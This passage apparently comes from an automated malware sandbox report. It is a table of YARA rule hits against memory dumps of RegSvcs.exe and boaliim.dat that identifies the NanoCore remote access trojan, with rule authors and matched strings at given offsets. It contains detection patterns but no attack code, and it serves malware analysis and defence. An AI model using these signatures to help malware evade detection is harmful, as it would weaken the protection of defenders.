0xc148:$b7: LogClientException 0x13c14:$b7: LogClientException
13.2.RegSvcs.exe.6e80000.19.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
13.2.RegSvcs.exe.6e80000.19.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
13.2.RegSvcs.exe.6e80000.19.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x4b96:$x2: NanoCore.ClientPlugin 0x4bbb:$x3: NanoCore.ClientPluginHost 0x4b87:$i3: IClientNetwork 0x4bac:$i4: IClientAppHost 0x4bd5:$i5: IClientDataHost 0x4be5:$i7: IClientNetworkHost 0x4bf8:$i9: IClientNameObjectCollection 0x4c1d:$i10: IClientReadOnlyNameObjectCollection 0x49ce:$s1: ClientPlugin 0x4b9f:$s1: ClientPlugin
13.2.RegSvcs.exe.6e80000.19.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x4bbb:$a1: NanoCore.ClientPluginHost 0x4b96:$a2: NanoCore.ClientPlugin 0x8558:$b1: get_BuilderSettings 0x4bac:$b4: IClientAppHost
13.2.RegSvcs.exe.7b10000.28.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7b10000.28.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7b10000.28.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x34e2:$x2: NanoCore.ClientPlugin 0x350b:$x3: NanoCore.ClientPluginHost 0x34d3:$i3: IClientNetwork 0x34f8:$i6: IClientLoggingHost 0x3525:$i7: IClientNetworkHost 0x334e:$s1: ClientPlugin 0x34eb:$s1: ClientPlugin
13.2.RegSvcs.exe.7b10000.28.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x350b:$a1: NanoCore.ClientPluginHost 0x34e2:$a2: NanoCore.ClientPlugin 0x5854:$b7: LogClientException 0x34f8:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7b60000.32.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7b60000.32.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7b60000.32.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5fc9:$x2: NanoCore.ClientPlugin 0x5fee:$x3: NanoCore.ClientPluginHost 0x5fba:$i3: IClientNetwork 0x5fdf:$i4: IClientAppHost 0x6008:$i5: IClientDataHost 0x6018:$i6: IClientLoggingHost 0x602b:$i7: IClientNetworkHost 0x603e:$i8: IClientUIHost 0x604c:$i9: IClientNameObjectCollection 0x5d70:$s1: ClientPlugin 0x5fd2:$s1: ClientPlugin
13.2.RegSvcs.exe.7b60000.32.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5fee:$a1: NanoCore.ClientPluginHost 0x5fc9:$a2: NanoCore.ClientPlugin 0x5fdf:$b4: IClientAppHost 0xa4ce:$b7: LogClientException 0x6018:$b9: IClientLoggingHost
7.3.boaliim.dat.1995c58.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.3.boaliim.dat.1995c58.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
7.3.boaliim.dat.1995c58.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.3.boaliim.dat.1995c58.0.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
7.3.boaliim.dat.1995c58.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
7.3.boaliim.dat.1995c58.0.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7ad0000.25.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x3deb:$x1: NanoCore.ClientPluginHost 0x3f48:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7ad0000.25.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x3deb:$x2: NanoCore.ClientPluginHost 0x4d41:$s3: PipeExists 0x3fe1:$s4: PipeCreated 0x3e05:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7ad0000.25.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3ed5:$x2: NanoCore.ClientPlugin 0x3deb:$x3: NanoCore.ClientPluginHost 0x3eeb:$i3: IClientNetwork 0x3e24:$i5: IClientDataHost 0x3e05:$i6: IClientLoggingHost 0x3f48:$i7: IClientNetworkHost 0x3e43:$i8: IClientUIHost 0x4d55:$i9: IClientNameObjectCollection 0x38fc:$s1: ClientPlugin 0x3ede:$s1: ClientPlugin 0x4d71:$s6: get_ClientSettings
13.2.RegSvcs.exe.7ad0000.25.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x3deb:$a1: NanoCore.ClientPluginHost 0x3ed5:$a2: NanoCore.ClientPlugin 0x572e:$b7: LogClientException 0x4d41:$b8: PipeExists 0x3e05:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7b00000.27.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x3d99:$x1: NanoCore.ClientPluginHost 0x3db3:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7b00000.27.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x3d99:$x2: NanoCore.ClientPluginHost 0x4dce:$s4: PipeCreated 0x3d86:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7b00000.27.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3d70:$x2: NanoCore.ClientPlugin 0x3d99:$x3: NanoCore.ClientPluginHost 0x3d61:$i3: IClientNetwork 0x3d86:$i6: IClientLoggingHost 0x3db3:$i7: IClientNetworkHost 0x3bd4:$s1: ClientPlugin 0x3d79:$s1: ClientPlugin 0x4084:$s2: EndPoint 0x408d:$s3: IPAddress 0x4097:$s4: IPEndPoint
13.2.RegSvcs.exe.7b00000.27.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x3d99:$a1: NanoCore.ClientPluginHost 0x3d70:$a2: NanoCore.ClientPlugin 0x3d86:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x10937:$x1: NanoCore.ClientPluginHost 0x10951:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x10937:$x2: NanoCore.ClientPluginHost 0x13c74:$s4: PipeCreated 0x10924:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1090e:$x2: NanoCore.ClientPlugin 0x10937:$x3: NanoCore.ClientPluginHost 0x108ff:$i3: IClientNetwork 0x10924:$i6: IClientLoggingHost 0x10951:$i7: IClientNetworkHost 0x10964:$i8: IClientUIHost 0x1066e:$s1: ClientPlugin 0x10917:$s1: ClientPlugin
13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x10937:$a1: NanoCore.ClientPluginHost 0x1090e:$a2: NanoCore.ClientPlugin 0x15962:$b7: LogClientException 0x10924:$b9: IClientLoggingHost
13.2.RegSvcs.exe.4833fe8.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
13.2.RegSvcs.exe.4833fe8.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
13.2.RegSvcs.exe.4833fe8.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.4833fe8.6.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0xf78e:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin 0xf781:$s1: ClientPlugin 0x147a2:$s6: get_ClientSettings
13.2.RegSvcs.exe.4833fe8.6.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf7ad:$a1: NanoCore.ClientPluginHost 0xf778:$a2: NanoCore.ClientPlugin 0x146f3:$b1: get_BuilderSettings 0x14662:$b7: LogClientException 0xf7c7:$b9: IClientLoggingHost
13.2.RegSvcs.exe.6d10000.18.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
13.2.RegSvcs.exe.6d10000.18.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
13.2.RegSvcs.exe.6d10000.18.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.6d10000.18.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xd978:$x2: NanoCore.ClientPlugin 0xd9ad:$x3: NanoCore.ClientPluginHost 0xd96c:$i2: IClientData 0xd98e:$i3: IClientNetwork 0xd99d:$i5: IClientDataHost 0xd9c7:$i6: IClientLoggingHost 0xd9da:$i7: IClientNetworkHost 0xd9ed:$i8: IClientUIHost 0xd9fb:$i9: IClientNameObjectCollection 0xda17:$i10: IClientReadOnlyNameObjectCollection 0xd76a:$s1: ClientPlugin 0xd981:$s1: ClientPlugin 0x129a2:$s6: get_ClientSettings
13.2.RegSvcs.exe.6d10000.18.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xd9ad:$a1: NanoCore.ClientPluginHost 0xd978:$a2: NanoCore.ClientPlugin 0x128f3:$b1: get_BuilderSettings 0x12862:$b7: LogClientException 0xd9c7:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7b10000.28.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x170b:$x1: NanoCore.ClientPluginHost 0x1725:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7b10000.28.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x170b:$x2: NanoCore.ClientPluginHost 0x34b6:$s4: PipeCreated 0x16f8:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7b10000.28.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x16e2:$x2: NanoCore.ClientPlugin 0x170b:$x3: NanoCore.ClientPluginHost 0x16d3:$i3: IClientNetwork 0x16f8:$i6: IClientLoggingHost 0x1725:$i7: IClientNetworkHost 0x154e:$s1: ClientPlugin 0x16eb:$s1: ClientPlugin
13.2.RegSvcs.exe.7b10000.28.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x170b:$a1: NanoCore.ClientPluginHost 0x16e2:$a2: NanoCore.ClientPlugin 0x3a54:$b7: LogClientException 0x16f8:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7a60000.20.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7a60000.20.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7a60000.20.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x6d7f:$x2: NanoCore.ClientPlugin 0x6da5:$x3: NanoCore.ClientPluginHost 0x6d70:$i3: IClientNetwork 0x6d95:$i5: IClientDataHost 0x6dbf:$i6: IClientLoggingHost 0x6dd2:$i7: IClientNetworkHost 0x6de5:$i9: IClientNameObjectCollection 0x6b02:$s1: ClientPlugin 0x6d88:$s1: ClientPlugin
13.2.RegSvcs.exe.7a60000.20.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x6da5:$a1: NanoCore.ClientPluginHost 0x6d7f:$a2: NanoCore.ClientPlugin 0x6dbf:$b9: IClientLoggingHost
13.2.RegSvcs.exe.385c5c0.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
13.2.RegSvcs.exe.385c5c0.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
13.2.RegSvcs.exe.385c5c0.4.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x6d7f:$x2: NanoCore.ClientPlugin 0x6da5:$x3: NanoCore.ClientPluginHost 0x6d70:$i3: IClientNetwork 0x6d95:$i5: IClientDataHost 0x6dbf:$i6: IClientLoggingHost 0x6dd2:$i7: IClientNetworkHost 0x6de5:$i9: IClientNameObjectCollection 0x6b02:$s1: ClientPlugin 0x6d88:$s1: ClientPlugin
13.2.RegSvcs.exe.385c5c0.4.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x6da5:$a1: NanoCore.ClientPluginHost 0x6d7f:$a2: NanoCore.ClientPlugin 0x6dbf:$b9: IClientLoggingHost
13.2.RegSvcs.exe.4977af2.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x4083:$x1: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.4977af2.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x4083:$x2: NanoCore.ClientPluginHost 0x4161:$s4: PipeCreated 0x409d:$s5: IClientLoggingHost
13.2.RegSvcs.exe.4977af2.8.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x40cd:$x2: NanoCore.ClientPlugin 0x4083:$x3: NanoCore.ClientPluginHost 0x40e3:$i3: IClientNetwork 0x409d:$i6: IClientLoggingHost 0x3e1c:$s1: ClientPlugin 0x40d6:$s1: ClientPlugin
13.2.RegSvcs.exe.4977af2.8.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x4083:$a1: NanoCore.ClientPluginHost 0x40cd:$a2: NanoCore.ClientPlugin 0x409d:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7a90000.21.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7a90000.21.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7a90000.21.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x175f:$x2: NanoCore.ClientPlugin 0x16e3:$x3: NanoCore.ClientPluginHost 0x1775:$i3: IClientNetwork 0x16fd:$i6: IClientLoggingHost 0x171c:$i7: IClientNetworkHost 0x1491:$s1: ClientPlugin 0x1768:$s1: ClientPlugin
13.2.RegSvcs.exe.7a90000.21.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x16e3:$a1: NanoCore.ClientPluginHost 0x175f:$a2: NanoCore.ClientPlugin 0x16fd:$b9: IClientLoggingHost
13.2.RegSvcs.exe.6e80000.19.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
13.2.RegSvcs.exe.6e80000.19.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
13.2.RegSvcs.exe.6e80000.19.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2d96:$x2: NanoCore.ClientPlugin 0x2dbb:$x3: NanoCore.ClientPluginHost 0x2d87:$i3: IClientNetwork 0x2dac:$i4: IClientAppHost 0x2dd5:$i5: IClientDataHost 0x2de5:$i7: IClientNetworkHost 0x2df8:$i9: IClientNameObjectCollection 0x2e1d:$i10: IClientReadOnlyNameObjectCollection 0x2bce:$s1: ClientPlugin 0x2d9f:$s1: ClientPlugin
13.2.RegSvcs.exe.6e80000.19.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2dbb:$a1: NanoCore.ClientPluginHost 0x2d96:$a2: NanoCore.ClientPlugin 0x6758:$b1: get_BuilderSettings 0x2dac:$b4: IClientAppHost
13.2.RegSvcs.exe.4833fe8.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
13.2.RegSvcs.exe.4833fe8.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
13.2.RegSvcs.exe.4833fe8.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.4833fe8.6.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xd978:$x2: NanoCore.ClientPlugin 0xd9ad:$x3: NanoCore.ClientPluginHost 0xd96c:$i2: IClientData 0xd98e:$i3: IClientNetwork 0xd99d:$i5: IClientDataHost 0xd9c7:$i6: IClientLoggingHost 0xd9da:$i7: IClientNetworkHost 0xd9ed:$i8: IClientUIHost 0xd9fb:$i9: IClientNameObjectCollection 0xda17:$i10: IClientReadOnlyNameObjectCollection 0xd76a:$s1: ClientPlugin 0xd981:$s1: ClientPlugin 0x129a2:$s6: get_ClientSettings
13.2.RegSvcs.exe.4833fe8.6.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xd9ad:$a1: NanoCore.ClientPluginHost 0xd978:$a2: NanoCore.ClientPlugin 0x128f3:$b1: get_BuilderSettings 0x12862:$b7: LogClientException 0xd9c7:$b9: IClientLoggingHost
7.3.boaliim.dat.192cc48.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.3.boaliim.dat.192cc48.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
7.3.boaliim.dat.192cc48.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.3.boaliim.dat.192cc48.2.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
7.3.boaliim.dat.192cc48.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
7.3.boaliim.dat.192cc48.2.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
13.2.RegSvcs.exe.37f43e4.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe75:$x1: NanoCore.ClientPluginHost 0x64a6:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
13.2.RegSvcs.exe.37f43e4.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe75:$x2: NanoCore.ClientPluginHost 0x64a6:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x6584:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x64c0:$s5: IClientLoggingHost
13.2.RegSvcs.exe.37f43e4.1.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0x64f0:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0x64a6:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0x6506:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0x64c0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x623f:$s1: ClientPlugin 0x64f9:$s1: ClientPlugin
13.2.RegSvcs.exe.37f43e4.1.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0x64a6:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x64f0:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost 0x64c0:$b9: IClientLoggingHost
13.2.RegSvcs.exe.5f60000.15.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1646:$x1: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.5f60000.15.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x1646:$x2: NanoCore.ClientPluginHost 0x1724:$s4: PipeCreated 0x1660:$s5: IClientLoggingHost
13.2.RegSvcs.exe.5f60000.15.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1690:$x2: NanoCore.ClientPlugin 0x1646:$x3: NanoCore.ClientPluginHost 0x16a6:$i3: IClientNetwork 0x1660:$i6: IClientLoggingHost 0x13df:$s1: ClientPlugin 0x1699:$s1: ClientPlugin
13.2.RegSvcs.exe.5f60000.15.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1646:$a1: NanoCore.ClientPluginHost 0x1690:$a2: NanoCore.ClientPlugin 0x1660:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7b34c9f.30.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1a53c:$x1: NanoCore.ClientPluginHost 0x1a556:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7b34c9f.30.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x1a53c:$x2: NanoCore.ClientPluginHost 0x1d879:$s4: PipeCreated 0x1a529:$s5: IClientLoggingHost
